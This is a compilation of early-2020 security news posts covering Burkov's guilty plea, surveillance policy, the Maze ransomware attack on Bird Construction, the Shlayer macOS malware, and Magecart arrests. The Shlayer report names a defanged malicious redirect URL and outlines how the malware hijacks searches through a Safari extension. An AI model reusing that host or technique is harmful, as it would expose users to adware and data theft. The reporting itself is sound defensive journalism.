The post Aggah: How to run a botnet without renting a Server (for more than a year) appeared first on Security Affairs.

Russian Cybercrime Boss Burkov Pleads Guilty

Aleksei Burkov, an ultra-connected Russian hacker once described as “an asset of supreme importance” to Moscow, has pleaded guilty in a U.S. court to running a site that sold stolen payment card data and to administering a highly secretive crime forum that counted among its members some of the most elite Russian cybercrooks.

Aleksei Burkov, seated second from right, attends a hearing in Jerusalem in 2015. Andrei Shirokov / Tass via Getty Images.

Burkov, 29, admitted to running CardPlanet, a site that sold more than 150,000 stolen credit card accounts, and to being the founder and administrator of DirectConnection — a closely guarded underground community that attracted some of the world’s most-wanted Russian hackers. He pleaded guilty last week in a Virginia court to access device fraud and conspiracy to commit computer intrusion, identity theft, wire fraud and money laundering.

As KrebsOnSecurity noted in a November 2019 profile of Burkov’s hacker nickname ‘k0pa,’ “a deep dive into the various pseudonyms allegedly used by Burkov suggests this individual may be one of the most connected and skilled malicious hackers ever apprehended by U.S. authorities, and that the Russian government is probably concerned that he simply knows too much.”

Membership in the DirectConnection fraud forum was heavily restricted. New members had to be native Russian speakers, provide a $5,000 deposit, and be vouched for by three existing crime forum members. Also, members needed to have a special encryption certificate installed in their Web browser before the forum’s login page would even load.

DirectConnection was something of a Who’s Who of major cybercriminals, and many of its most well-known members have likewise been extradited to and prosecuted by the United States. Those include Sergey “Fly” Vovnenko, who was sentenced to 41 months in prison for operating a botnet and stealing login and payment card data. Vovnenko also served as administrator of his own cybercrime forum, which he used in 2013 to carry out a plan to have Yours Truly framed for heroin possession.

As noted in last year’s profile of Burkov, an early and important member of DirectConnection was a hacker who went by the moniker “aqua” and ran the banking sub-forum on Burkov’s site. In December 2019, the FBI offered a $5 million bounty leading to the arrest and conviction of aqua, who has been identified as Maksim Viktorovich Yakubets. The Justice Department says Yakubets/aqua ran a transnational cybercrime organization called “Evil Corp.” that stole roughly $100 million from victims.

In this 2011 screenshot of DirectConnection, we can see the nickname of “aqua,” who ran the “banking” sub-forum on DirectConnection. Aqua, a.k.a. Maksim V. Yakubets of Russia, now has a $5 million bounty on his head from the FBI.

According to a statement of facts in Burkov’s case, the author of the infamous SpyEye banking trojan, Aleksandr “Gribodemon” Panin, was personally vouched for by Burkov. Panin was sentenced in 2016 to 24 years in prison.

Other top DirectConnection members include convicted credit card fraudsters Vladislav “Badb” Horohorin and Sergey “zo0mer” Kozerev, as well as the infamous spammer and botnet master Peter “Severa” Levashov.

Burkov was arrested in 2015 on an international warrant while he was visiting Israel, and over the ensuing four years the Russian government aggressively sought to keep him from being extradited to the United States. When Israeli authorities turned down requests to send him back to Russia — supposedly to face separate hacking charges there — the Russians then imprisoned a young Israeli woman on trumped-up drug charges in a bid to trade prisoners.

As the news outlet Haaretz reported in October, Naama Issachar was arrested while changing planes in Russia on her way home from a yoga course in India. Russian police said they found approximately 10 grams of marijuana in Issachar’s bag. Issachar denied smuggling drugs, saying she had not sought to enter Russia during her layover and had no access to her luggage during her brief stay in the Russian airport.

Haaretz noted that the Russian government pressed Israel to exchange Burkov for Issachar. When Israel’s supreme court cleared the way for Burkov’s extradition to the United States, Issachar was found guilty of drug smuggling and sentenced to 7.5 years in jail.

But according to a story today in The Times of Israel, the Kremlin has signaled that Russian President Vladimir Putin may make a decision “in the near future,” on a possible pardon for Issachar, whose mother reportedly met with Putin while the Russian leader was visiting Israel last week.

Burkov currently is scheduled to be sentenced on May 8. He faces a maximum sentence of 15 years in prison.

Modern Mass Surveillance: Identify, Correlate, Discriminate

Communities across the United States are starting to ban facial recognition technologies. In May of last year, San Francisco banned facial recognition; the neighboring city of Oakland soon followed, as did Somerville and Brookline in Massachusetts (a statewide ban may follow). In December, San Diego suspended a facial recognition program in advance of a new statewide law, which declared it illegal, coming into effect. Forty major music festivals pledged not to use the technology, and activists are calling for a nationwide ban. Many Democratic presidential candidates support at least a partial ban on the technology.

These efforts are well-intentioned, but facial recognition bans are the wrong way to fight against modern surveillance. Focusing on one particular identification method misconstrues the nature of the surveillance society we're in the process of building. Ubiquitous mass surveillance is increasingly the norm. In countries like China, a surveillance infrastructure is being built by the government for social control. In countries like the United States, it's being built by corporations in order to influence our buying behavior, and is incidentally used by the government.

In all cases, modern mass surveillance has three broad components: identification, correlation and discrimination. Let's take them in turn.

Facial recognition is a technology that can be used to identify people without their knowledge or consent. It relies on the prevalence of cameras, which are becoming both more powerful and smaller, and machine learning technologies that can match the output of these cameras with images from a database of existing photos.

But that's just one identification technology among many. People can be identified at a distance by their heartbeat or by their gait, using a laser-based system. Cameras are so good that they can read fingerprints and iris patterns from meters away. And even without any of these technologies, we can always be identified because our smartphones broadcast unique numbers called MAC addresses. Other things identify us as well: our phone numbers, our credit card numbers, the license plates on our cars. China, for example, uses multiple identification technologies to support its surveillance state.

Once we are identified, the data about who we are and what we are doing can be correlated with other data collected at other times. This might be movement data, which can be used to "follow" us as we move throughout our day. It can be purchasing data, Internet browsing data, or data about who we talk to via email or text. It might be data about our income, ethnicity, lifestyle, profession and interests. There is an entire industry of data brokers who make a living analyzing and augmenting data about who we are -- using surveillance data collected by all sorts of companies and then sold without our knowledge or consent.

There is a huge -- and almost entirely unregulated -- data broker industry in the United States that trades on our information. This is how large Internet companies like Google and Facebook make their money. It's not just that they know who we are, it's that they correlate what they know about us to create profiles about who we are and what our interests are. This is why many companies buy license plate data from states. It's also why companies like Google are buying health records, and part of the reason Google bought the company Fitbit, along with all of its data.

The whole purpose of this process is for companies -- and governments -- to treat individuals differently. We are shown different ads on the Internet and receive different offers for credit cards. Smart billboards display different advertisements based on who we are. In the future, we might be treated differently when we walk into a store, just as we currently are when we visit websites.

The point is that it doesn't matter which technology is used to identify people. That there currently is no comprehensive database of heartbeats or gaits doesn't make the technologies that gather them any less effective. And most of the time, it doesn't matter if identification isn't tied to a real name. What's important is that we can be consistently identified over time. We might be completely anonymous in a system that uses unique cookies to track us as we browse the Internet, but the same process of correlation and discrimination still occurs. It's the same with faces; we can be tracked as we move around a store or shopping mall, even if that tracking isn't tied to a specific name. And that anonymity is fragile: If we ever order something online with a credit card, or purchase something with a credit card in a store, then suddenly our real names are attached to what was anonymous tracking information.

Regulating this system means addressing all three steps of the process. A ban on facial recognition won't make any difference if, in response, surveillance systems switch to identifying people by smartphone MAC addresses. The problem is that we are being identified without our knowledge or consent, and society needs rules about when that is permissible.

Similarly, we need rules about how our data can be combined with other data, and then bought and sold without our knowledge or consent. The data broker industry is almost entirely unregulated; there's only one law -- passed in Vermont in 2018 -- that requires data brokers to register and explain in broad terms what kind of data they collect. The large Internet surveillance companies like Facebook and Google collect dossiers on us that are more detailed than those of any police state of the previous century. Reasonable laws would prevent the worst of their abuses.

Finally, we need better rules about when and how it is permissible for companies to discriminate. Discrimination based on protected characteristics like race and gender is already illegal, but those rules are ineffectual against the current technologies of surveillance and control. When people can be identified and their data correlated at a speed and scale previously unseen, we need new rules.

Today, facial recognition technologies are receiving the brunt of the tech backlash, but focusing on them misses the point. We need to have a serious conversation about all the technologies of identification, correlation and discrimination, and decide how much we as a society want to be spied on by governments and corporations -- and what sorts of influence we want them to have over our lives.

This essay previously appeared in the New York Times.

EDITED TO ADD: Rereading this post-publication, I see that it comes off as overly critical of those who are doing activism in this space. Writing the piece, I wasn't thinking about political tactics. I was thinking about the technologies that support surveillance capitalism, and law enforcement's usage of that corporate platform. Of course it makes sense to focus on face recognition in the short term. It's something that's easy to explain, viscerally creepy, and obviously actionable. It also makes sense to focus specifically on law enforcement's use of the technology; there are clear civil and constitutional rights issues. The fact that law enforcement is so deeply involved in the technology's marketing feels wrong. And the technology is currently being deployed in Hong Kong against political protesters. It's why the issue has momentum, and why we've gotten the small wins we've had. (The EU is considering a five-year ban on face recognition technologies.) Those wins build momentum, which leads to more wins. I should have been kinder to those in the trenches.

If you want to help, sign the petition from Public Voice calling on a moratorium on facial recognition technology for mass surveillance. Or write to your US congressperson and demand similar action. There's more information from EFF and EPIC.

Cloudy with a Chance of Extremely High Alert Accuracy

You can tell it’s raining by sticking your head out the door; but what’s the likelihood of it stopping in the next hour? What’s the temperature and relative humidity? Suddenly the need for analytics is apparent. Without it, the chance of getting soaked on any given day would dramatically increase.

Analytics makes the world go ‘round. So why shouldn’t it be the same in security? According to our CISO Benchmark Study, only 35% of respondents said it was easy to determine the scope of a compromise, contain it, and remediate it. This is where analytics can come in, helping to turn the tide. Analytics are becoming increasingly critical for security, and when done right, can significantly improve an organization’s risk posture.

With so much at stake, cybersecurity should be seamless, precise, and manageable. Unfortunately, as I elaborated on in my last blog post, that’s not often the case. Organizations have become accustomed to purchasing and using too many security products without having enough people to manage them – resulting in more alerts than can be digested.

Forecast: Advanced Analytics

We understand the importance of delivering security intelligence that can be easily obtained, understood, and responded to in a timely manner. Seventy-seven percent of our customers say that our industry-leading Network Traffic Analysis (NTA) solution, Cisco Stealthwatch, has reduced their time to detect and remediate threats from months to hours, and has provided a fast return on investment.

Stealthwatch provides enterprise-wide visibility from the private network to the public cloud – including from endpoints and encrypted traffic. It delivers comprehensive situational awareness to help organizations detect, prioritize, and mitigate threats in real time.

Customers Enhance Security with Stealthwatch

The in-depth visibility and robust analytics provided by Stealthwatch translate into high-fidelity alerts, dramatically decreasing the need to manually sift through massive amounts of information to pinpoint a security threat. In fact, our customers consistently rate greater than 90 percent of the alerts they receive from Stealthwatch as “helpful,” meaning they lead to something that definitely needs attention. Minimizing noise and zeroing in on what’s most important is a requirement for effectively protecting today’s complex, modernized environments.

  • According to the Durham County Government, Stealthwatch has increased visibility and detection of internal threats by at least 80% and has reduced incident response time by 90%.
  • According to Dimension Data, Stealthwatch has decreased incident response time by over 100 days.
  • And with Stealthwatch, J. Crew Group can now respond to incidents in 10-15 minutes.

A Platform Approach to Security

Stealthwatch is part of a portfolio of products that work together as a team, learning from each other and improving each other’s effectiveness. For example, Stealthwatch integrates with our incident response portal, Cisco Threat Response, and our security policy management tool, Cisco Defense Orchestrator. We also integrate third-party solutions to deliver more thorough and impactful defenses.

Stealthwatch leverages many aspects of our platform approach to security – including integration, automation, and machine learning – to harden networks and simplify protection. It’s like knowing with confidence what the weather will be like all day and having exactly the right kind of clothes to stay comfortable and dry.

Learn More

If you are joining us this week at Cisco Live in Barcelona, come check out Stealthwatch at one of the sessions or experience a demo within the Security area at the World of Solutions. Or, learn more about Stealthwatch here and take our free 2-week visibility assessment to see how powerful security analytics can quickly surface threats that might be lurking within your network.

The post Cloudy with a Chance of Extremely High Alert Accuracy appeared first on Cisco Blogs.

US Rolls Out New Bill to Reform NSA Surveillance

US senators have proposed a bill that would drastically reform the surveillance practices of the National Security Agency (NSA) and increase oversight of government surveillance.

Titled The Safeguarding Americans’ Private Records Act, the bill was introduced on Thursday by Senators Ron Wyden, Zoe Lofgren, Pramila Jayapal, Warren Davidson, and Steve Daines.

According to a statement on Wyden's website, the changes proposed in the bill will "protect Americans’ rights against unnecessary government surveillance."

The bill comes ahead of the March 15 expiration of Section 215 of the Patriot Act, which the National Security Agency "used to create a secret mass surveillance program that swept up millions of Americans’ phone calls." The phone record program was terminated last year.

The bill prohibits the "warrantless collection of cell site location and GPS information as well as browsing history and internet search history and ensures that the government cannot conduct collection for intelligence purposes that would violate the Fourth Amendment in the criminal context."

Furthermore, the bill aims to establish the Foreign Intelligence Surveillance Act (FISA) process as the only process by which the government is allowed to carry out surveillance. By doing this, the bill intends to close what it describes as "secret law" loopholes that have allowed the US government to clandestinely conduct surveillance outside the FISA process in the past.

Other reforms proposed by the bill include increased congressional oversight of government surveillance activities, with new public reporting requirements regarding Americans whose information has been collected under Sections 215 and 702 of the Patriot Act.

Commenting on the new bill, Jack Mannino, CEO at Virginia-based application security provider nVisium, said: "These are important steps towards protecting the civil liberties and Fourth Amendment rights of citizens. Intelligence agencies do important work, and it's necessary for them to be able to do their jobs, while preserving legal and moral boundaries. States, such as California, have passed legislation to protect internet privacy, and other states are quickly moving in the same direction. Overreaching surveillance erodes trust in the systems we use and our expectation of privacy."

Ontario construction firm victim of ransomware attack

A multi-million dollar Ontario construction firm that has worked on major federal and provincial projects including facilities for national defence and police stations has been hit by a ransomware attack.

According to CBC News, Bird Construction of Mississauga, Ont., acknowledged that it was recently victimized, but didn’t give any details.

“Bird Construction responded to a cyber incident that resulted in the encryption of company files,” the CBC quoted an unnamed company spokesperson as saying. “Bird continued to function with no business impact, and we worked with leading cybersecurity experts to restore access to the affected files.”

IT World Canada has been trying unsuccessfully to get hold of the company.


Brett Callow,  a British Columbia-based security analyst with the anti-virus software firm Emsisoft, told IT World Canada that in December the group behind the Maze ransomware posted a note on its site that it had infected the construction company’s systems. The Maze group includes data theft among its strategies, using the threat of releasing some data to pressure victims into paying up. That December note was one of a list of companies Maze said hadn’t co-operated, so their data might be released.

It isn’t clear from the company’s statement if it paid a ransom. But Callow said that for a brief period of time the employee records of a few Bird Construction employees — including their social insurance numbers — were posted on the Maze site. In addition, a document from Calgary-based Suncor Energy that didn’t have personally identifiable information was briefly published by Maze.

“It’s not at all unlikely that the actors are still in possession of the data,” Callow said in an email. “Even if Bird paid the ransom, it seems likely that the criminals would retain the data as they are able to use or monetize at a later date.”

Callow added he has major concerns around the exfiltration and blackmail tactics that are being deployed.

“Based on what we see, it seems many companies are quietly paying ransoms and then making no form of disclosure (the U.K. press is currently looking into another case). And, of course, that means employees and customers do not find out that their data has been exposed and so do not know that they should take action,” he explained.

For its fiscal year ending December 2018, Bird Construction had operating revenue of $1.3 billion and a net loss of $1 million. The fiscal 2019 results haven’t been announced yet. In November the company recorded a third-quarter net income of $6.8 million on construction revenue of $378 million. In December the company said it had signed a subcontract with the consortium building the second stage of an extension of Ottawa’s light rail transit line. Its job will be to build seven of the 16 stations and a light maintenance and storage facility. No value for that contract was announced.

Over the years Bird Construction has built, or been part of consortiums that built, a number of facilities across Canada, some of which could be considered sensitive. These include the $263 million RCMP southern B.C. headquarters in Surrey; 18 facilities for the Ontario Provincial Police; an aircraft maintenance hangar for Canadian Forces Base Trenton, Ont.; and the $104 million expansion of helicopter facilities at the air force base in Dartmouth, Nova Scotia.

New privacy assessments now included in Microsoft Compliance Score

Keeping up with rapidly changing regulatory requirements has become one of the biggest challenges organizations face today. Just as companies finished preparing for the General Data Protection Regulation (GDPR), California’s privacy regulation—the California Consumer Privacy Act (CCPA)—went into effect on January 1, 2020. And in August 2020, Brazil’s own GDPR-like regulation, Lei Geral de Proteção de Dados (LGPD), will start to be enforced.

To help you take a proactive role in getting ahead of privacy compliance, we’re announcing new privacy-focused assessments available in the public preview of Microsoft Compliance Score. These new assessments help you assess your compliance posture and provide guidance to implement more effective controls for CCPA, LGPD, ISO/IEC 27701:2019, and SOC 1 Type 2 and SOC 2 Type 2.

To learn more, read Microsoft Compliance Score helps address the ever-changing data privacy landscape.

The post New privacy assessments now included in Microsoft Compliance Score appeared first on Microsoft Security.

Major Canadian Military Contractor Compromised in Ransomware Attack

A Canadian construction company that won military and government contracts worth millions of dollars has suffered a ransomware attack. 

General contractor Bird Construction, which is based in Toronto, was allegedly targeted by cyber-threat group MAZE in December 2019. MAZE claims to have stolen 60 GB of data from the company, which landed 48 contracts worth $406m with Canada's Department of National Defense between 2006 and 2015.

In an email to the Canadian Broadcasting Corporation (CBC), a Bird Construction company spokesperson wrote: "Bird Construction responded to a cyber incident that resulted in the encryption of company files. Bird continued to function with no business impact, and we worked with leading cyber security experts to restore access to the affected files."

MAZE's modus operandi is to demand a ransom from its victim to secure the return of data that the group has stolen and encrypted. Victims are warned that failure to pay up will result in the data's publication. If a victim refuses to pay, MAZE's next move is typically to publish a small quantity of the data it claims to have stolen to show it means business.

According to Emsisoft threat analyst Brett Callow, MAZE has now published data it claims to have stolen from Bird Construction. The published files contain employees' personal data and information relating to Canadian company Suncor Energy, with which Bird Construction has worked on multiple projects. 

Callow told Infosecurity Magazine: "Maze actually published some of Bird’s data. The files included documents relating to Suncor and records for a couple of Bird employees which included their names, home addresses, phone numbers, banking info, social insurance numbers, tax forms, health numbers, drug and alcohol test results—everything that a criminal would need to steal their identity. And all that info was posted on the clear web where anybody could’ve accessed it." 

The published data, which Infosecurity Magazine has viewed, consisted of two large PDF files, each relating to a separate Bird Construction employee, plus documents detailing vehicle entry authorization and alcohol and drug testing procedures at Suncor.

Callow added: "The big question is: what else did MAZE get and did any of the data relate to Bird's government and military contracts?" 

Bird Construction has not said whether a ransom was paid to its cyber-attackers. Callow advised any company that gets hit by ransomware not to pay up.

He said: "There is no way for a company to know that the data will be deleted after a ransom has been paid. In fact, it probably will not be deleted. Why would a criminal enterprise delete data that they may be able to use or monetize at a later date?"

What You Should Actually Learn From a Pentest Report

Dakota Nelson // Unknown Unknowns: So you’ve been pentested. Congrats! It might not feel like it, but this will eventually leave you more confident about your security, not less. The real question is – why might it not feel like it? Pentest findings can be broken down many ways, of course – the obvious one […]

The post What You Should Actually Learn From a Pentest Report appeared first on Black Hills Information Security.

US Space Industry to Launch Cybersecurity Portal

Spring 2020 will see the launch of a new US cybersecurity resource designed to protect the space industry. 

Space News reported last Thursday that the Space Information Sharing and Analysis Center, or Space ISAC, is currently in the process of setting up an unclassified portal where companies can share and analyze information on cybersecurity threats. The portal will go live at the tail end of spring.

The activation of the portal will mark the official start of operations for Space ISAC, which was formally established in April 2019 as a nonprofit organization during a classified session at the 35th Space Symposium in Colorado Springs, Colorado. 

The need to establish a Space ISAC to secure commercial, government, and military space communications from cyber-attacks on global space assets was recognized by the Science & Technology Partnership Forum in 2017. The Forum shared its vision for the organization’s conception in April 2018 at the 34th Space Symposium.

Space ISAC was founded initially by Kratos Defense & Security Solutions. Ten other companies have since joined as founding members, though some wish to keep their connection with the organization under wraps. Firms that have made their membership of Space ISAC public include Booz Allen Hamilton, SES, Parsons Corp, Lockheed Martin, and MITRE, which all joined as founding members.

The senior vice president of Kratos and chairman of the board for Space ISAC, Frank Backes, said that once the new portal is in operation, Space ISAC will work to recruit and vet potential members. The organization is hoping to sign up as many as 200 member companies from the civil, commercial, and national security space sectors.

Annual membership fees will be $10,000 for silver membership, $25,000 for gold, and $50,000 for platinum; however, the organization will consider offering lower rates to small enterprises and startups.

Along with the portal, Backes said that Space ISAC intends to set up a "space systems vulnerability laboratory" for NCC analysts and ISAC members at the National Cybersecurity Center (NCC) in Colorado Springs. 

Space ISAC plans to hold its first ever summit meeting at the NCC's Cyber Symposium in Denver on June 15 and 16 of this year.

Which was the most common threat to macOS devices in 2019? Shlayer malware

Malware authors continue to show interest in macOS devices, and Kaspersky experts have confirmed that the Shlayer malware was the most common threat to the macOS platform.

Security experts from Kaspersky Lab revealed that the Shlayer malware was the most widespread macOS threat in 2019.

In February, malware researchers at Carbon Black spotted a new strain of the Shlayer malware that was targeting macOS versions from 10.10.5 up to 10.14.3.

The malware posed as an Adobe Flash update and was distributed through a large number of websites, both fake domains and compromised legitimate ones.

Shlayer macOS Malware

This variant of the Shlayer malware employs multiple levels of obfuscation; experts discovered that many of the initial DMGs are signed with a legitimate Apple developer ID.

The malware installs the Any Search bar on the targeted Mac to deploy adware; it also intercepts and collects browser data and is able to alter search results to deliver malicious ads.

According to Kaspersky, in 2019 one in ten of its Mac security solutions encountered this malware at least once.

“For close to two years now, the Shlayer Trojan has been the most common threat on the macOS platform: in 2019, one in ten of our Mac security solutions encountered this malware at least once, and it accounts for almost 30% of all detections for this OS.” reads the analysis published by Kaspersky. “The first specimens of this family fell into our hands back in February 2018, and we have since collected almost 32,000 different malicious samples of the Trojan and identified 143 C&C server domains.”

The malware was used to deliver multiple adware including AdWare.OSX.Cimpli, AdWare.OSX.Bnodlero, AdWare.OSX.Pirrit, and AdWare.OSX.Geonei.

Experts pointed out that the infection process of the Shlayer malware hasn’t changed over time and that the malicious code remained active throughout 2019.

Unlike other Bash-based macOS malware, the Shlayer family is written in Python, and its operation algorithm differs from that of other threats.

Shlayer serves only as the initial stage of the attack: it gains a foothold on the system, downloads the main payload, and runs it.

“The negative consequences for the user can be seen by investigating the AdWare.OSX.Cimpli family, which was being actively downloaded by the Trojan at the time of writing.” continues the report. “But in actual fact, Cimpli performs several actions unseen by the user. First, it installs a malicious extension in Safari, hiding the OS security notification behind a malware fake window. By clicking on the buttons in the notification, the user in effect agrees to install the extension.”

The researchers detailed one of the extensions downloaded and installed by the malware that is called Management. The extension monitors user searches and redirects them to the address hxxp://lkysearchex41343-a.akamaihd[.]net/as?q=c by injecting the script script.js in the browser pages. The malicious code also loads the mitmdump tool, which is packed using PyInstaller.

Most Shlayer infection attempts were observed in the U.S. (31%), followed by Germany (14%), France (10%), and the UK (10%).

“Having studied the Shlayer family, we can conclude that the macOS platform is a good source of revenue for cybercriminals.” concludes the report. “The Trojan links even reside on legitimate resources — attackers are adept in the art of social engineering, and it is hard to predict how sophisticated the next deception technique will be.”

Pierluigi Paganini

(SecurityAffairs – Shlayer, hacking)

The post Which was the most common threat to macOS devices in 2019? Shlayer malware appeared first on Security Affairs.

Police Bust 3 Suspected Magecart Hackers in Indonesia

Operation 'Night Fury' Targets JavaScript Skimming Gangs Hitting E-Commerce Sites
Police in Indonesia have arrested three suspected members of an e-commerce hacking crew that used JavaScript sniffing code to steal customer and payment card data. The arrests came as part of Interpol's ongoing anti-skimming operation, codenamed "Night Fury," targeting hackers in southeast Asia.

From Privacy to Trust and ROI

As we embark on a new decade, data privacy has become top-of-mind for business executives and consumers worldwide. Data breaches frequently expose the personal data of millions, and many companies have not done enough to protect themselves from intentional or unintentional misuse. While it is often hard to reach agreement on new legislation, one issue that governments around the world seem to agree on is the need to help protect the personal data of their constituents. The EU’s General Data Protection Regulation (GDPR) became enforceable in May 2018, and many countries, from China to Brazil, have updated or passed their own regulations. The new California Consumer Privacy Act (CCPA) became effective at the beginning of 2020, other states are following suit, and a U.S. Federal privacy law is now under consideration.

Insights from the Cisco Data Privacy Research Program

The Cisco Chief Privacy Office has provided groundbreaking research and insights to help organizations and consumers understand what they can and should do to keep data safe and maximize their investments in data privacy. Two years ago, we launched our Data Privacy Benchmark Study, which explored privacy maturity and investments across thousands of organizations worldwide. We found that two-thirds of organizations were experiencing significant sales delays due to customers’ data privacy concerns, but that privacy investment was minimizing those delays. Last year, we expanded our inquiry to explore a wide range of business benefits, including the connection between privacy investment and security benefits such as fewer and less costly breaches. In November, we released a companion study looking at the attitudes and behaviors of consumers worldwide. We identified a large group we call “Privacy Actives” – that is, consumers who care about privacy, are willing to spend time or money to protect their data, and have already switched companies or providers based on their data policies.

The 2020 Data Privacy Benchmark Study and the ROI of Privacy

Today, in observance of International Data Privacy Day, I am pleased to share our 2020 Data Privacy Benchmark Study. Drawing on data from 2800 organizations in 13 countries, we have – for the first time – calculated the ROI for privacy. In addition, we updated the privacy metrics we have been tracking over several years, and the study explores the value of privacy certifications in today’s market. The key findings:

  • For every dollar spent on privacy, the average organization is getting $2.70 in associated benefits. We asked respondents to quantify their annual privacy investment and business benefits, and we used this to calculate their privacy ROI. Most organizations are seeing very positive returns, and over 40% are realizing at least double their investment.
  • 70% of organizations say they received significant business benefits from privacy beyond compliance. This is up from 40% last year, and includes better agility and innovation, increased competitive advantage, improved attractiveness to investors, and greater customer trust.
  • Higher accountability translates to increased benefits: Companies with higher accountability scores (as assessed using the Accountability Wheel of the Centre for Information Policy Leadership) experience lower breach costs, shorter sales delays, and higher financial returns.
  • Eighty-two percent of organizations see privacy certifications as a motivation for purchasing: Privacy certifications such as the ISO 27701 and the EU-U.S. Privacy Shield are becoming an important purchasing factor when selecting a third-party vendor.

What does this mean for organizations?

The results of this study highlight that privacy is good for business, beyond any compliance requirements. We recommend that organizations:

  • Invest in privacy beyond the legal minimum; most organizations are seeing very positive returns on their privacy spending.
  • Work to obtain external privacy certifications; these have become an important factor in the buying process.
  • Build in privacy accountability and maturity to achieve security benefits, reduced sales delays, and higher returns.

In future blogs, I will explore these results more fully, including some of the interesting differences in results across geographies and company size.


More Information

Cisco Data Privacy Benchmark Study 2020

Press Announcement Cisco Data Privacy Benchmark Study 2020 Confirms Positive Financial Benefits of Strong Corporate Data Privacy Practices

Cisco Data Privacy Benchmark Study 2020 – Infographic

Cisco 2019 Data Privacy Benchmark Study

Consumer Privacy Survey

Cisco Data Privacy

Follow Robert on Twitter @RobertWaitman


The post From Privacy to Trust and ROI appeared first on Cisco Blogs.

NY Bills Would Ban Municipalities From Meeting Ransomware Demands

Two state senators from New York State introduced bills that would ban municipalities from meeting ransomware attackers’ demands. On January 14, 2020, NYS Senator Phil Boyle of the 4th Senate District proposed Senate Bill S7246. Senator Boyle along with his cosponsors Senator George M. Borrello of the 57th Senate District and Senator Sue Serino of […]

The post NY Bills Would Ban Municipalities From Meeting Ransomware Demands appeared first on The State of Security.

Hashtag Trending – Big brother’s watch in UK; YouTube mods and PTSD; Sidewalk Lab’s smart city delay

Hashtag Today is about big brother watching over UK citizens, YouTube moderators allegedly being forced into acknowledging PTSD as a health hazard, and the delay of Sidewalk Lab’s smart city in Toronto. Thank you for tuning in to Hashtag Trending, it’s Monday, January 27th, and I’m your host, Tom Li. Trending on Google, United Kingdom…

Smartphone Election in Washington State

This year:

King County voters will be able to use their name and birthdate to log in to a Web portal through the Internet browser on their phones, says Bryan Finney, the CEO of Democracy Live, the Seattle-based voting company providing the technology.

Once voters have completed their ballots, they must verify their submissions and then submit a signature on the touch screen of their device.

Finney says election officials in Washington are adept at signature verification because the state votes entirely by mail. That will be the way people are caught if they log in to the system under false pretenses and try to vote as someone else.

The King County elections office plans to print out the ballots submitted electronically by voters whose signatures match and count the papers alongside the votes submitted through traditional routes.

While advocates say this creates an auditable paper trail, many security experts say that because the ballots cross the Internet before they are printed, any subsequent audits on them would be moot. If a cyberattack occurred, an audit could essentially require double-checking ballots that may already have been altered, says Buell.

Of course it's not an auditable paper trail. There's a reason why security experts use the phrase "voter-verifiable paper ballots." A centralized printout of a received Internet message is not voter verifiable.

Another news article.

Royal Yachting Association Resets Passwords After Breach

The Royal Yachting Association (RYA) is forcing a password reset for all online users after warning some that their data may have been compromised by a third party.

The UK’s national body for all things nautical appears to have moved quickly in response to the discovery.

“We have recently become aware that an unauthorized party accessed and may have acquired a database created in 2015 containing personal data associated with a number of RYA user accounts. The affected information included email addresses and RYA website passwords which were encrypted and therefore not visible,” it explained.

“The affected information included name, email and hashed passwords — the majority held with the salted hash function, which is used to secure passwords. The affected data did not include any financial or payment information and in this stage in our investigation there is no evidence that this data has been misused — it was legacy test data and it appears that the unauthorized party who gained access to a hosted server subsequently deleted that database.”

Despite passwords being salted and hashed, the RYA is taking no chances and will require all web users to choose a new credential. It is also urging members to be on the lookout for potential phishing scams attempting to capitalize on the breach notification.

“Please note that any email from the RYA about this issue (subject: Important notification regarding RYA Account Security) does not contain attachments and does not request your personal data,” it clarified.

“If you receive an email about this issue which suggests you download an attachment, or asks you for information, the email was not sent by RYA and may be an attempt to steal your personal data.”

Several yachters took to an industry forum warning of such an attempt, until they were reassured that the breach notification email was genuine. Some expressed surprise at receiving the email as they aren’t RYA members, although their email address may have found its way onto the “test” database another way.

Operation Night Fury: Group-IB helps take down a cybergang behind the infection of hundreds of websites all over the world

More details have emerged from the recently disclosed Operation Night Fury, in which Group-IB helped take down a cybergang behind the infection of hundreds of e-commerce websites.

Operators of the JavaScript-sniffer family, dubbed «GetBilling» by Group-IB, were arrested in Indonesia. The arrest came as a result of a joint operation «Night Fury» initiated by INTERPOL’s ASEAN Cyber Capability Desk (ASEAN Desk) that involved Indonesian Cyber Police (BARESKRIM POLRI (Dittipidsiber)) and Group-IB’s APAC Cyber Investigations Team.

The operation is still ongoing in five ASEAN countries with which the intelligence was also shared. This case marks the first successful multi-jurisdictional operation against the operators of JavaScript-sniffers in the region. According to Group-IB’s data, the suspects have managed to infect hundreds of websites in various locations, including in Indonesia, Australia, the United Kingdom, the United States, Germany, Brazil, and some other countries. Payment and personal data of thousands of online shoppers from Asia, Europe, and the Americas have been stolen.

The three suspects with the initials «ANF» (27 y.o.), «K» (35 y.o.), and «N» (23 y.o.) were arrested in December 2019 in two different regions of Indonesia — the Special Region of Yogyakarta and the Special Capital Region of Jakarta — as part of the joint operation «Night Fury» carried out by Indonesian Cyber Police and INTERPOL with the help of Group-IB’s Cyber Investigations team. During the operation, Indonesian Cyber Police seized laptops, mobile phones of various brands, CPU units, IDs, a BCA token, and ATM cards. The suspected operators of the GetBilling JavaScript-sniffer family are charged with the theft of electronic data, which carries up to a 10-year jail sentence under the Indonesian criminal code.

“Strong and effective partnerships between police and the cybersecurity industry are essential to ensure law enforcement worldwide has access to the information they need to address the scale and complexity of today’s cyberthreat landscape. This successful operation is just one example of how law enforcement are working with industry partners, adapting and applying new technologies to aid investigations and ultimately reduce the global impact of cybercrime,” concluded Mr Jones.

Craig Jones

INTERPOL’s Director of Cybercrime

“There are many challenges and obstacles in cross-border hi-tech crime investigations like this. The Night Fury Operation showed that these obstacles could only be overcome with close collaboration between national law enforcement, international organizations and private companies. Effective multi-jurisdictional coordination of efforts between Indonesia’s Cyber Police, INTERPOL and Group-IB allowed to attribute the crimes, establish the perpetrators behind the JS-sniffer and arrest them. But more importantly to protect the community and raise public awareness about the problem of cybercrime and its impact.”

Idam Wasiadi

Police Superintendent, Cybercrime Investigator at Directorate of Cybercrime of CID of Indonesian National Police

“With cybercrime being a growing threat across the region, the ASEAN Desk was launched by INTERPOL to assist law enforcement agencies enhance their proactive response against cybercrime. Through this operation, it is clear that timely intelligence sharing and coordinated actions are the ways forward to effectively combat cybercrime regionally and globally.”

James Tan

INTERPOL Acting Assistant Director (Strategy & Capabilities Development)

JavaScript-sniffers (JS-sniffers) targeting e-commerce websites are a type of malicious JavaScript code designed to steal customer payment and personal data such as credit card numbers, names, addresses, logins, phone numbers, and credentials for payment systems.

